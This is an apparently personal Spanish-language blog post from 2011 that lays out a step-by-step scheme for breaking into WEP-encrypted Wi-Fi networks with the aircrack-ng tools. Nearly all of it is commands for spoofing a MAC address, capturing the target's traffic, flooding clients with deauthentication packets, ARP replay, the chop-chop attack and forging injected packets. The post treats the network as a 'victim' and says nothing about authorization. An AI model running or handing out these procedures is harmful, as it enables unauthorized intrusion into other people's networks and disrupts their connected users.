lunes, 7 de noviembre de 2011

Esquema ataques WEP

Os dejo aquí un esquema sobre ataques WEP. Sí, sé que está un pelín anticuado, pero es la base que hay que tener para hacer ataques WPA. Antes de que alguien me acuse de copy/paste, éste esquema lo creé yo, y anda circulando por la web por un usuario con nick CHRONOX 6. Espero que os sirva, está muy esquematizado así que si no queda algo claro, por favor comentádmelo.


DEFINICIONES: 
ch: Canal de la víctima.
interface: Nombre de la tarjeta de red a utilizar.
BSSID: Dirección de la víctima el hexadecimal (XX:XX:XX:XX:XX:XX)
ESSID: Nombre de la víctima
MAC: Dirección de nuestra tarjeta de red en hexadecimal (XX:XX:XX:XX:XX:XX)

1. FAKEAMOS NUESTRA DIRECCIÓN MAC (3 formas)
a) Mediante la aplicación Macchanger del entorno gráfico
b) Mediante comandos: macchanger
    • macchanger –m 00:11:22:33:44:55
c) Mediante comandos: ifconfig
   • ifconfig <interface> down
    • ifconfig <interface> hw ether 00:11:22:33:44:55
    • ifconfig <interface> up




2. ESCANEO DE REDES
Escaneamos las redes, escogemos la víctima y apuntamos su BSSID y su canal. Usaremos el siguiente comando:
   • airodump-ng <interface>

3) CAMBIO DE CANAL DE LA TARJETA DE RED
Usaremos el siguiente comando:
   • airmon-ng start <interface> <ch>

4) CAPTURA DE PAQUETES
Ejecutaremos el comando airodump filtrando las redes por canal y BSSID:
   • airodump-ng  -c <ch> -b <BSSID víctima> -w <nombre del archivo> <interface>
Este comando, aparte de empezar la captura de IV’s nos dará la información necesaria para los siguientes pasos.


5) ATAQUE  Para atacar, seguiremos el siguiente algoritmo lógico por orden:

1.Vemos en la captura de paquetes que hay clientes asociados a la red. Procedemos lanzando una reinyección de paquetes ARP al cliente asociado (ATK3) del siguiente modo:
   • aireplay-ng -3 –b <BSSID víctima> -h <MAC cliente asociado> <interface>
Observamos que:

     1.1.Hay tráfico ARP y/o los IV’s aumentan rápidamente. Esto significa que el cliente está generando tráfico  y estamos capturando los Vectores de inicialización. Todo es correcto, esperamos a que aumenten los IV’s hasta unos 250.000 y nos disponemos a atacar con aircrack.
      1.2.No hay tráfico ARP y/o los IV’s no aumentan o lo hacen lentamente. En este caso procederemos lanzando un ataque DDoS (ATK0), y si no funciona, lanzaremos un ataque Chop-chop de Korek (ATK4):


a) ATK0: Procedemos de la siguiente forma:
          • aireplay-ng -0 0 –a <BSSID víctima> -c <MAC cliente asociado> <interface> (En caso de que estemos asociados a un solo cliente)
          • aireplay-ng -0 0 -a <BSSID víctima> <interface> (En caso de que estemos asociados varios clientes)


b) ATK4: Procedemos de la siguiente forma:
          • aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
         “Saving plaintext in <nombre que copiaremos al portapapeles.cap>
          “Saving keystream in <nombre que copiaremos al portapapeles.xor>

Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente, por lo tanto procedemos con el siguiente comando:
          • tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
          • packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
          • aireplay-ng -2 –r  <nombre de archivo a enviar.cap> <interface>
_________________________________


2. Vemos en la captura de paquetes que NO hay clientes asociados a la red. Procedemos lanzando una reinyección de paquetes ARP a un cliente falso de MAC y después creamos dicho cliente ATK1:
   • aireplay-ng -3 –b <BSSID víctima> -h <MAC fakeada> <interface>
    • aireplay-ng -1 30 –e <ESSID víctima> -a <BSSID víctima> -h <MAC fakeada> <interface>

Observamos que:


    2.1. Hay tráfico ARP y/o los IV’s aumentan rápidamente. Esto significa que con el cliente falso estamos generando tráfico y estamos capturando los Vectores de inicialización. Todo es correcto, esperamos a que aumenten los IV’s hasta 250.000 y nos disponemos a atacar con aircrack.
    2.2. No hay tráfico ARP y/o los IV’s no aumentan o lo hacen lentamente. En este caso procederemos lanzando el ataque Chop-chop de Korek (ATK4) de la siguiente forma:

a) ATK4: Procedemos de la siguiente forma:
         • aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
          “Saving plaintext in <nombre que copiaremos al portapapeles.cap>
          “Saving keystream in <nombre que copiaremos al portapapeles.xor>
Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente falso, por lo tanto procedemos con el siguiente comando:
          • tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
          • packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
          • aireplay-ng -2 –r  <nombre de archivo a enviar.cap> <interface>




Y eso es todo... el tema de aircrack es mas facil, buscad en el foro de seguridadwireless que hay manuales buenos sobre esto.


No hay comentarios:

Publicar un comentario